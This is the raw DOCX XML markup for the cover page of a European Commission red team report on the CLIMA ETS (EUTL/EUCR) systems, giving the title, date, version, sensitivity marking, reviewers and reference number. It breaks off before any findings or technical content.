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Letterhead"/>
        <w:tblW w:w="9480" w:type="dxa"/>
        <w:tblLook w:val="0480" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2400"/>
        <w:gridCol w:w="7080"/>
      </w:tblGrid>
      <w:bookmarkStart w:id="0" w:name="_Hlk184884567" w:displacedByCustomXml="next"/>
      <w:bookmarkEnd w:id="0" w:displacedByCustomXml="next"/>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:sz w:val="16"/>
          </w:rPr>
          <w:alias w:val="EC Header - Standard"/>
          <w:tag w:val="A4pCgmOjXaoPaysOY21Ij7-5QkCVxYFQ4ANGFaoRKN4I2"/>
          <w:id w:val="1341964474"/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:tr w:rsidR="002836C5" w:rsidRPr="001019D3" w14:paraId="2DED00D6" w14:textId="77777777">
            <w:trPr>
              <w:cantSplit/>
            </w:trPr>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="2400" w:type="dxa"/>
              </w:tcPr>
              <w:p w14:paraId="322B27A5" w14:textId="77777777" w:rsidR="002836C5" w:rsidRPr="001019D3" w:rsidRDefault="00457432" w:rsidP="003B18F5">
                <w:pPr>
                  <w:pStyle w:val="ZFlag"/>
                </w:pPr>
                <w:r w:rsidRPr="001019D3">
                  <w:drawing>
                    <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="541B7023" wp14:editId="3BA9CDA6">
                      <wp:extent cx="1371600" cy="676800"/>
                      <wp:effectExtent l="0" t="0" r="0" b="0"/>
                      <wp:docPr id="1" name="Logo" descr="Logo of the European Commission, 12 yellow stars on a blue background arranged in a circle and framed by two light grey graphic elements representing the Berlaymont building, which is the headquarter of the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Logo of the European Commission, 12 yellow stars on a blue background arranged in a circle and framed by two light grey graphic elements representing the Berlaymont building, which is the headquarter of the European Commissio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0" cy="676800"/>
                              </a:xfrm>
                              <a:prstGeom prst="rect">
                                <a:avLst/>
                              </a:prstGeom>
                            </pic:spPr>
                          </pic:pic>
                        </a:graphicData>
                      </a:graphic>
                    </wp:inline>
                  </w:drawing>
                </w:r>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="7080" w:type="dxa"/>
              </w:tcPr>
              <w:p w14:paraId="3C9CA169" w14:textId="77777777" w:rsidR="002836C5" w:rsidRPr="001019D3" w:rsidRDefault="00706DA2">
                <w:pPr>
                  <w:pStyle w:val="ZCom"/>
                </w:pPr>
                <w:sdt>
                  <w:sdtPr>
                    <w:id w:val="-739479063"/>
                    <w:dataBinding w:xpath="/Texts/OrgaRoot" w:storeItemID="{4EF90DE6-88B6-4264-9629-4D8DFDFE87D2}"/>
                    <w:text w:multiLine="1"/>
                  </w:sdtPr>
                  <w:sdtEndPr/>
                  <w:sdtContent>
                    <w:r w:rsidR="00DE2900" w:rsidRPr="001019D3">
                      <w:t>EUROPEAN COMMISSION</w:t>
                    </w:r>
                  </w:sdtContent>
                </w:sdt>
              </w:p>
              <w:p w14:paraId="5FE90306" w14:textId="77777777" w:rsidR="002836C5" w:rsidRPr="001019D3" w:rsidRDefault="00706DA2">
                <w:pPr>
                  <w:pStyle w:val="ZDGName"/>
                  <w:rPr>
                    <w:caps/>
                  </w:rPr>
                </w:pPr>
                <w:sdt>
                  <w:sdtPr>
                    <w:rPr>
                      <w:caps/>
                    </w:rPr>
                    <w:id w:val="1182476306"/>
                    <w:dataBinding w:xpath="/Author/OrgaEntity1/HeadLine1" w:storeItemID="{F68B380E-6E4C-46B9-9B35-227E84EF5D65}"/>
                    <w:text w:multiLine="1"/>
                  </w:sdtPr>
                  <w:sdtEndPr/>
                  <w:sdtContent>
                    <w:r w:rsidR="00DE2900" w:rsidRPr="001019D3">
                      <w:rPr>
                        <w:caps/>
                      </w:rPr>
                      <w:t xml:space="preserve">DIRECTORATE-GENERAL FOR DIGITAL SERVICES </w:t>
                    </w:r>
                  </w:sdtContent>
                </w:sdt>
              </w:p>
              <w:p w14:paraId="0925DAC5" w14:textId="77777777" w:rsidR="002836C5" w:rsidRPr="001019D3" w:rsidRDefault="002836C5">
                <w:pPr>
                  <w:pStyle w:val="ZDGName"/>
                </w:pPr>
              </w:p>
              <w:p w14:paraId="0C466607" w14:textId="77777777" w:rsidR="002836C5" w:rsidRPr="001019D3" w:rsidRDefault="00706DA2">
                <w:pPr>
                  <w:pStyle w:val="ZDGName"/>
                </w:pPr>
                <w:sdt>
                  <w:sdtPr>
                    <w:id w:val="-1912382909"/>
                    <w:dataBinding w:xpath="/Author/OrgaEntity2/HeadLine1" w:storeItemID="{F68B380E-6E4C-46B9-9B35-227E84EF5D65}"/>
                    <w:text w:multiLine="1"/>
                  </w:sdtPr>
                  <w:sdtEndPr/>
                  <w:sdtContent>
                    <w:r w:rsidR="00DE2900" w:rsidRPr="001019D3">
                      <w:t>Directorate S – Cybersecurity</w:t>
                    </w:r>
                  </w:sdtContent>
                </w:sdt>
              </w:p>
              <w:p w14:paraId="03C4BF56" w14:textId="77777777" w:rsidR="002836C5" w:rsidRPr="001019D3" w:rsidRDefault="00706DA2">
                <w:pPr>
                  <w:pStyle w:val="ZDGName"/>
                  <w:rPr>
                    <w:b/>
                  </w:rPr>
                </w:pPr>
                <w:sdt>
                  <w:sdtPr>
                    <w:rPr>
                      <w:b/>
                    </w:rPr>
                    <w:id w:val="576328556"/>
                    <w:dataBinding w:xpath="/Author/OrgaEntity3/HeadLine1" w:storeItemID="{F68B380E-6E4C-46B9-9B35-227E84EF5D65}"/>
                    <w:text w:multiLine="1"/>
                  </w:sdtPr>
                  <w:sdtEndPr/>
                  <w:sdtContent>
                    <w:r w:rsidR="00DE2900" w:rsidRPr="001019D3">
                      <w:rPr>
                        <w:b/>
                      </w:rPr>
                      <w:t>DIGIT.S.1 – Cybersecurity Policy Implementation</w:t>
                    </w:r>
                  </w:sdtContent>
                </w:sdt>
              </w:p>
            </w:tc>
          </w:tr>
        </w:sdtContent>
      </w:sdt>
    </w:tbl>
    <w:p w14:paraId="6ADA3276" w14:textId="0F82561F" w:rsidR="00B01C17" w:rsidRPr="001019D3" w:rsidRDefault="00706DA2" w:rsidP="00591FD8">
      <w:pPr>
        <w:pStyle w:val="Marking"/>
        <w:ind w:right="-39"/>
        <w:rPr>
          <w:lang w:val="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:sdt>
        <w:sdtPr>
          <w:alias w:val="Sensitive Markings - DG"/>
          <w:tag w:val="NOfNBZ6F2aca7sZmEWyKB2-18pgCGiUVKommpC9dTE3v3"/>
          <w:id w:val="-1310013168"/>
        </w:sdtPr>
        <w:sdtEndPr>
          <w:rPr>
            <w:highlight w:val="yellow"/>
          </w:rPr>
        </w:sdtEndPr>
        <w:sdtContent>
          <w:sdt>
            <w:sdtPr>
              <w:rPr>
                <w:rStyle w:val="MarkingLabel"/>
                <w:lang w:val="de-DE"/>
              </w:rPr>
              <w:id w:val="-1946993571"/>
              <w:dataBinding w:xpath="/Texts/SensitiveLabel" w:storeItemID="{4EF90DE6-88B6-4264-9629-4D8DFDFE87D2}"/>
              <w:text w:multiLine="1"/>
            </w:sdtPr>
            <w:sdtEndPr>
              <w:rPr>
                <w:rStyle w:val="MarkingLabel"/>
              </w:rPr>
            </w:sdtEndPr>
            <w:sdtContent>
              <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
                <w:rPr>
                  <w:rStyle w:val="MarkingLabel"/>
                  <w:lang w:val="de-DE"/>
                </w:rPr>
                <w:t>Sensitive</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
          <w:bookmarkStart w:id="1" w:name="_Ref_Footnote_0"/>
          <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
            <w:rPr>
              <w:rStyle w:val="MarkingLabel"/>
              <w:b w:val="0"/>
              <w:lang w:val="de-DE"/>
            </w:rPr>
            <w:t> (</w:t>
          </w:r>
          <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
            <w:rPr>
              <w:rStyle w:val="FootnoteReference"/>
              <w:lang w:val="de-DE"/>
            </w:rPr>
            <w:footnoteReference w:customMarkFollows="1" w:id="1"/>
            <w:t>*</w:t>
          </w:r>
          <w:bookmarkEnd w:id="1"/>
          <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
            <w:rPr>
              <w:lang w:val="de-DE"/>
            </w:rPr>
            <w:t xml:space="preserve">): </w:t>
          </w:r>
          <w:r w:rsidR="00C05FB8" w:rsidRPr="001019D3">
            <w:rPr>
              <w:i/>
              <w:iCs/>
              <w:lang w:val="de-DE"/>
            </w:rPr>
            <w:t xml:space="preserve">CLIMA, </w:t>
          </w:r>
          <w:sdt>
            <w:sdtPr>
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="28"/>
                <w:lang w:val="de-DE"/>
              </w:rPr>
              <w:id w:val="92364752"/>
              <w:placeholder>
                <w:docPart w:val="8BD33337FF6E458FBD567FF1325DC82F"/>
              </w:placeholder>
              <w:dataBinding w:xpath="/EurolookProperties/DocumentMetadata/EC_SecurityDistributionDG" w:storeItemID="{D3EA5527-7367-4268-9D83-5125C98D0ED2}"/>
              <w:text w:multiLine="1"/>
            </w:sdtPr>
            <w:sdtContent>
              <w:r w:rsidR="00953B60" w:rsidRPr="00953B60">
                <w:rPr>
                  <w:rStyle w:val="MacroTextChar"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="28"/>
                  <w:lang w:val="de-DE"/>
                </w:rPr>
                <w:t xml:space="preserve">DIGIT.B4, </w:t>
              </w:r>
              <w:r w:rsidR="00E023C8">
                <w:rPr>
                  <w:rStyle w:val="MacroTextChar"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="28"/>
                  <w:lang w:val="de-DE"/>
                </w:rPr>
                <w:t xml:space="preserve">DIGIT.C1, </w:t>
              </w:r>
              <w:r w:rsidR="00953B60" w:rsidRPr="00953B60">
                <w:rPr>
                  <w:rStyle w:val="MacroTextChar"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="28"/>
                  <w:lang w:val="de-DE"/>
                </w:rPr>
                <w:t>DIGIT.C3, DIGIT.C4,</w:t>
              </w:r>
              <w:r w:rsidR="00953B60" w:rsidRPr="00953B60">
                <w:rPr>
                  <w:rStyle w:val="MacroTextChar"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="28"/>
                  <w:lang w:val="de-DE"/>
                </w:rPr>
                <w:t xml:space="preserve"> </w:t>
              </w:r>
              <w:r w:rsidR="00953B60" w:rsidRPr="00953B60">
                <w:rPr>
                  <w:rStyle w:val="MacroTextChar"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="28"/>
                  <w:lang w:val="de-DE"/>
                </w:rPr>
                <w:t>DIGIT.S1, DIGIT.S2</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:kern w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:alias w:val="Title - Title"/>
        <w:tag w:val="20VJyCZsNoL1O30TqXpiB2-gJSyBkzfgj6hRyurrJnQpP"/>
        <w:id w:val="2034768669"/>
        <w:placeholder>
          <w:docPart w:val="DefaultPlaceholder_-1854013440"/>
        </w:placeholder>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:kern w:val="28"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:bookmarkStart w:id="2" w:name="eltqTitle" w:displacedByCustomXml="prev"/>
        <w:p w14:paraId="7AED6B69" w14:textId="3C308257" w:rsidR="00035901" w:rsidRPr="001019D3" w:rsidRDefault="00035901" w:rsidP="00035901">
          <w:pPr>
            <w:pStyle w:val="Title"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="4820"/>
              <w:tab w:val="right" w:pos="8505"/>
            </w:tabs>
            <w:spacing w:before="960" w:after="0"/>
          </w:pPr>
          <w:r w:rsidRPr="001019D3">
            <w:t>Adversarial Cyber</w:t>
          </w:r>
          <w:r w:rsidR="00BC0178" w:rsidRPr="001019D3">
            <w:t>s</w:t>
          </w:r>
          <w:r w:rsidRPr="001019D3">
            <w:t xml:space="preserve">ecurity </w:t>
          </w:r>
          <w:r w:rsidR="00BC0178" w:rsidRPr="001019D3">
            <w:t xml:space="preserve">Testing </w:t>
          </w:r>
          <w:r w:rsidRPr="001019D3">
            <w:t>Service</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="3FF521F9" w14:textId="013E8852" w:rsidR="00710724" w:rsidRPr="001019D3" w:rsidRDefault="00710724" w:rsidP="00035901">
          <w:pPr>
            <w:pStyle w:val="Title"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="4820"/>
              <w:tab w:val="right" w:pos="8505"/>
            </w:tabs>
            <w:spacing w:before="960" w:after="0"/>
          </w:pPr>
          <w:r w:rsidRPr="001019D3">
            <w:t>R</w:t>
          </w:r>
          <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
            <w:t xml:space="preserve">ed </w:t>
          </w:r>
          <w:r w:rsidRPr="001019D3">
            <w:t>T</w:t>
          </w:r>
          <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
            <w:t>eam</w:t>
          </w:r>
          <w:r w:rsidRPr="001019D3">
            <w:t xml:space="preserve"> Report</w:t>
          </w:r>
          <w:bookmarkStart w:id="3" w:name="eltqSubject"/>
          <w:bookmarkEnd w:id="2"/>
        </w:p>
        <w:p w14:paraId="3F57614D" w14:textId="4649DF5C" w:rsidR="00C05FB8" w:rsidRPr="001019D3" w:rsidRDefault="00F47812" w:rsidP="0047154C">
          <w:pPr>
            <w:pStyle w:val="Title"/>
            <w:spacing w:before="480" w:after="1560" w:afterAutospacing="0"/>
            <w:rPr>
              <w:sz w:val="40"/>
            </w:rPr>
          </w:pPr>
          <w:bookmarkStart w:id="4" w:name="techSectionBreak1"/>
          <w:bookmarkEnd w:id="3"/>
          <w:r w:rsidRPr="001019D3">
            <w:rPr>
              <w:sz w:val="40"/>
            </w:rPr>
            <w:t>CLIMA ETS (EUTL/EUCR) Campaign No 1</w:t>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:sdt>
      <w:sdtPr>
        <w:alias w:val="Properties Table"/>
        <w:tag w:val="ZmBdss0Rs4YTyKKEh8M5n5"/>
        <w:id w:val="-200874786"/>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:tbl>
          <w:tblPr>
            <w:tblStyle w:val="PropertiesTable"/>
            <w:tblW w:w="6400" w:type="dxa"/>
            <w:tblLook w:val="0480" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
          </w:tblPr>
          <w:tblGrid>
            <w:gridCol w:w="2400"/>
            <w:gridCol w:w="4000"/>
          </w:tblGrid>
          <w:tr w:rsidR="00B01C17" w:rsidRPr="001019D3" w14:paraId="66C078A0" w14:textId="77777777">
            <w:trPr>
              <w:cantSplit/>
            </w:trPr>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="2400" w:type="dxa"/>
              </w:tcPr>
              <w:p w14:paraId="519CBE2D" w14:textId="71ADD589" w:rsidR="00B01C17" w:rsidRPr="001019D3" w:rsidRDefault="00706DA2">
                <w:sdt>
                  <w:sdtPr>
                    <w:id w:val="-1490932610"/>
                    <w:dataBinding w:xpath="/Texts/TechPropsDate" w:storeItemID="{4EF90DE6-88B6-4264-9629-4D8DFDFE87D2}"/>
                    <w:text w:multiLine="1"/>
                  </w:sdtPr>
                  <w:sdtEndPr/>
                  <w:sdtContent>
                    <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
                      <w:t>Date:</w:t>
                    </w:r>
                  </w:sdtContent>
                </w:sdt>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="4000" w:type="dxa"/>
              </w:tcPr>
              <w:p w14:paraId="05389533" w14:textId="4613BFC3" w:rsidR="00B01C17" w:rsidRPr="001019D3" w:rsidRDefault="00706DA2">
                <w:sdt>
                  <w:sdtPr>
                    <w:alias w:val=""/>
                    <w:id w:val="530695034"/>
                    <w:dataBinding w:xpath="/EurolookProperties/DocumentDate" w:storeItemID="{D3EA5527-7367-4268-9D83-5125C98D0ED2}"/>
                    <w:date w:fullDate="2025-11-05T00:00:00Z">
                      <w:dateFormat w:val="d MMMM yyyy"/>
                      <w:lid w:val="en-GB"/>
                      <w:storeMappedDataAs w:val="dateTime"/>
                      <w:calendar w:val="gregorian"/>
                    </w:date>
                  </w:sdtPr>
                  <w:sdtEndPr/>
                  <w:sdtContent>
                    <w:r w:rsidR="00F27A8E" w:rsidRPr="001019D3">
                      <w:t>5 November 2025</w:t>
                    </w:r>
                  </w:sdtContent>
                </w:sdt>
              </w:p>
            </w:tc>
          </w:tr>
          <w:tr w:rsidR="00B01C17" w:rsidRPr="001019D3" w14:paraId="6DCDCF9B" w14:textId="77777777">
            <w:trPr>
              <w:cantSplit/>
            </w:trPr>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="2400" w:type="dxa"/>
              </w:tcPr>
              <w:p w14:paraId="00E08DB0" w14:textId="71641E95" w:rsidR="00B01C17" w:rsidRPr="001019D3" w:rsidRDefault="00706DA2">
                <w:sdt>
                  <w:sdtPr>
                    <w:id w:val="-2011519983"/>
                    <w:dataBinding w:xpath="/Texts/TechPropsVersion" w:storeItemID="{4EF90DE6-88B6-4264-9629-4D8DFDFE87D2}"/>
                    <w:text w:multiLine="1"/>
                  </w:sdtPr>
                  <w:sdtEndPr/>
                  <w:sdtContent>
                    <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
                      <w:t>Version:</w:t>
                    </w:r>
                  </w:sdtContent>
                </w:sdt>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="4000" w:type="dxa"/>
              </w:tcPr>
              <w:p w14:paraId="41A83A35" w14:textId="52BCCBF7" w:rsidR="00B01C17" w:rsidRPr="001019D3" w:rsidRDefault="00706DA2">
                <w:sdt>
                  <w:sdtPr>
                    <w:alias w:val="Version"/>
                    <w:id w:val="1897553057"/>
                    <w:placeholder>
                      <w:docPart w:val="1F233A74982143148B2C64043263D812"/>
                    </w:placeholder>
                    <w:dataBinding w:xpath="/EurolookProperties/DocumentVersion" w:storeItemID="{D3EA5527-7367-4268-9D83-5125C98D0ED2}"/>
                    <w:text w:multiLine="1"/>
                  </w:sdtPr>
                  <w:sdtEndPr/>
                  <w:sdtContent>
                    <w:r w:rsidR="00F27A8E" w:rsidRPr="001019D3">
                      <w:t>1</w:t>
                    </w:r>
                    <w:r w:rsidR="00D80598" w:rsidRPr="001019D3">
                      <w:t>.</w:t>
                    </w:r>
                    <w:r w:rsidR="00F27A8E" w:rsidRPr="001019D3">
                      <w:t>0</w:t>
                    </w:r>
                  </w:sdtContent>
                </w:sdt>
              </w:p>
            </w:tc>
          </w:tr>
          <w:tr w:rsidR="00B01C17" w:rsidRPr="001019D3" w14:paraId="412511B7" w14:textId="77777777">
            <w:trPr>
              <w:cantSplit/>
            </w:trPr>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="2400" w:type="dxa"/>
              </w:tcPr>
              <w:p w14:paraId="0BA25623" w14:textId="04A7F490" w:rsidR="00B01C17" w:rsidRPr="001019D3" w:rsidRDefault="00706DA2">
                <w:sdt>
                  <w:sdtPr>
                    <w:id w:val="-404377669"/>
                    <w:dataBinding w:xpath="/Texts/TechPropsAuthors" w:storeItemID="{4EF90DE6-88B6-4264-9629-4D8DFDFE87D2}"/>
                    <w:text w:multiLine="1"/>
                  </w:sdtPr>
                  <w:sdtEndPr/>
                  <w:sdtContent>
                    <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
                      <w:t>Authors:</w:t>
                    </w:r>
                  </w:sdtContent>
                </w:sdt>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="4000" w:type="dxa"/>
              </w:tcPr>
              <w:p w14:paraId="6DCF34AF" w14:textId="55FAE991" w:rsidR="00B01C17" w:rsidRPr="001019D3" w:rsidRDefault="00706DA2">
                <w:sdt>
                  <w:sdtPr>
                    <w:id w:val="-45223034"/>
                    <w:placeholder>
                      <w:docPart w:val="854C1BAE7E1742468BAA4E175BEA7C61"/>
                    </w:placeholder>
                    <w:dataBinding w:xpath="/Author/Names/DocumentScript/FullName" w:storeItemID="{F68B380E-6E4C-46B9-9B35-227E84EF5D65}"/>
                    <w:text w:multiLine="1"/>
                  </w:sdtPr>
                  <w:sdtEndPr/>
                  <w:sdtContent>
                    <w:r w:rsidR="00F32FD8" w:rsidRPr="001019D3">
                      <w:t>DIGIT.S1.SA</w:t>
                    </w:r>
                  </w:sdtContent>
                </w:sdt>
              </w:p>
            </w:tc>
          </w:tr>
          <w:tr w:rsidR="00B01C17" w:rsidRPr="001019D3" w14:paraId="43BDAB9F" w14:textId="77777777">
            <w:trPr>
              <w:cantSplit/>
            </w:trPr>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="2400" w:type="dxa"/>
              </w:tcPr>
              <w:p w14:paraId="462561F0" w14:textId="42A0F9BC" w:rsidR="00B01C17" w:rsidRPr="001019D3" w:rsidRDefault="00706DA2">
                <w:sdt>
                  <w:sdtPr>
                    <w:id w:val="-1084909946"/>
                    <w:dataBinding w:xpath="/Texts/TechPropsRevised" w:storeItemID="{4EF90DE6-88B6-4264-9629-4D8DFDFE87D2}"/>
                    <w:text w:multiLine="1"/>
                  </w:sdtPr>
                  <w:sdtEndPr/>
                  <w:sdtContent>
                    <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
                      <w:t>Revised by:</w:t>
                    </w:r>
                  </w:sdtContent>
                </w:sdt>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="4000" w:type="dxa"/>
              </w:tcPr>
              <w:p w14:paraId="232B0077" w14:textId="37243FBB" w:rsidR="00B01C17" w:rsidRPr="001019D3" w:rsidRDefault="00DF0481">
                <w:r w:rsidRPr="001019D3">
                  <w:t>Sam MENGHI</w:t>
                </w:r>
              </w:p>
            </w:tc>
          </w:tr>
          <w:tr w:rsidR="00B01C17" w:rsidRPr="001019D3" w14:paraId="65C74D9F" w14:textId="77777777">
            <w:trPr>
              <w:cantSplit/>
            </w:trPr>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="2400" w:type="dxa"/>
              </w:tcPr>
              <w:p w14:paraId="5E6DDD29" w14:textId="34996688" w:rsidR="00B01C17" w:rsidRPr="001019D3" w:rsidRDefault="00706DA2">
                <w:sdt>
                  <w:sdtPr>
                    <w:id w:val="-809009003"/>
                    <w:dataBinding w:xpath="/Texts/TechPropsApproved" w:storeItemID="{4EF90DE6-88B6-4264-9629-4D8DFDFE87D2}"/>
                    <w:text w:multiLine="1"/>
                  </w:sdtPr>
                  <w:sdtEndPr/>
                  <w:sdtContent>
                    <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
                      <w:t>Approved by:</w:t>
                    </w:r>
                  </w:sdtContent>
                </w:sdt>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="4000" w:type="dxa"/>
              </w:tcPr>
              <w:p w14:paraId="37CA4509" w14:textId="11C406C6" w:rsidR="00B01C17" w:rsidRPr="001019D3" w:rsidRDefault="00DF0481">
                <w:r w:rsidRPr="001019D3">
                  <w:t>Mattia FOLADOR</w:t>
                </w:r>
              </w:p>
            </w:tc>
          </w:tr>
          <w:tr w:rsidR="00B01C17" w:rsidRPr="001019D3" w14:paraId="163739E7" w14:textId="77777777">
            <w:trPr>
              <w:cantSplit/>
            </w:trPr>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="2400" w:type="dxa"/>
              </w:tcPr>
              <w:p w14:paraId="29F9C76C" w14:textId="7BFF42F3" w:rsidR="00B01C17" w:rsidRPr="001019D3" w:rsidRDefault="00706DA2">
                <w:sdt>
                  <w:sdtPr>
                    <w:id w:val="2038613462"/>
                    <w:dataBinding w:xpath="/Texts/TechPropsPublic" w:storeItemID="{4EF90DE6-88B6-4264-9629-4D8DFDFE87D2}"/>
                    <w:text w:multiLine="1"/>
                  </w:sdtPr>
                  <w:sdtEndPr/>
                  <w:sdtContent>
                    <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
                      <w:t>Public:</w:t>
                    </w:r>
                  </w:sdtContent>
                </w:sdt>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="4000" w:type="dxa"/>
              </w:tcPr>
              <w:p w14:paraId="6E643AF8" w14:textId="4BA17863" w:rsidR="00B01C17" w:rsidRPr="001019D3" w:rsidRDefault="005E6AE9">
                <w:r w:rsidRPr="001019D3">
                  <w:t>Coordination Cell</w:t>
                </w:r>
              </w:p>
            </w:tc>
          </w:tr>
          <w:tr w:rsidR="00B01C17" w:rsidRPr="001019D3" w14:paraId="33BD2C7D" w14:textId="77777777">
            <w:trPr>
              <w:cantSplit/>
            </w:trPr>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="2400" w:type="dxa"/>
              </w:tcPr>
              <w:p w14:paraId="5FB5057E" w14:textId="0AB8526D" w:rsidR="00B01C17" w:rsidRPr="001019D3" w:rsidRDefault="00706DA2">
                <w:sdt>
                  <w:sdtPr>
                    <w:id w:val="-557773883"/>
                    <w:dataBinding w:xpath="/Texts/TechPropsRefno" w:storeItemID="{4EF90DE6-88B6-4264-9629-4D8DFDFE87D2}"/>
                    <w:text w:multiLine="1"/>
                  </w:sdtPr>
                  <w:sdtEndPr/>
                  <w:sdtContent>
                    <w:r w:rsidR="00B01C17" w:rsidRPr="001019D3">
                      <w:t>Reference Number:</w:t>
                    </w:r>
                  </w:sdtContent>
                </w:sdt>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="4000" w:type="dxa"/>
              </w:tcPr>
              <w:p w14:paraId="3EA0A3EA" w14:textId="191987D0" w:rsidR="00B01C17" w:rsidRPr="001019D3" w:rsidRDefault="00E552BB">
                <w:r w:rsidRPr="001019D3">
                  <w:t>SASIST-</w:t>
                </w:r>
                <w:r w:rsidR="006769A8" w:rsidRPr="001019D3">
                  <w:t>2263</w:t>
                </w:r>
              </w:p>
            </w:tc>
          </w:tr>
        </w:tbl>
        <w:p w14:paraId="47077BAC" w14:textId="1225B33B" w:rsidR="00710724" w:rsidRPr="001019D3" w:rsidRDefault="00706DA2" w:rsidP="00B01C17"/>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="7D3BCA3D" w14:textId="77777777" w:rsidR="00C05FB8" w:rsidRPr="001019D3" w:rsidRDefault="00C05FB8">
      <w:pPr>
        <w:pStyle w:val="HistTableHeading"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="4"/>
        </w:rPr>
        <w:sectPr w:rsidR="00C05FB8" w:rsidRPr="001019D3" w:rsidSect="006B2B67">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1906" w:h="16838"/>
          <w:pgMar w:top="1021" w:right="1588" w:bottom="1021" w:left="1588" w:header="567" w:footer="567" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="326"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="4"/>
        </w:rPr>
        <w:alias w:val="History Table"/>
        <w:tag w:val="PiT5cxNc44EbCTosFkXVi0"/>
        <w:id w:val="-2111956302"/>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:p w14:paraId="539B3960" w14:textId="4B598984" w:rsidR="00967A91" w:rsidRPr="001019D3" w:rsidRDefault="00706DA2">
          <w:pPr>
            <w:pStyle w:val="HistTableHeading"/>
          </w:pPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="2139375224"/>
              <w:dataBinding w:xpath="/Texts/TechHistory" w:storeItemID="{4EF90DE6-88B6-4264-9629-4D8DFDFE87D2}"/>
              <w:text w:multiLine="1"/>
            </w:sdtPr>
            <w:sdtEndPr/>
            <w:sdtContent>
              <w:r w:rsidR="007F2A14" w:rsidRPr="001019D3">
                <w:t>Document History</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
        </w:p>
        <w:tbl>
          <w:tblPr>
            <w:tblStyle w:val="TableHistory"/>
            <w:tblW w:w="5000" w:type="pct"/>
            <w:tblCellMar>
              <w:left w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tblCellMar>
            <w:tblLook w:val="0420" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
          </w:tblPr>
          <w:tblGrid>
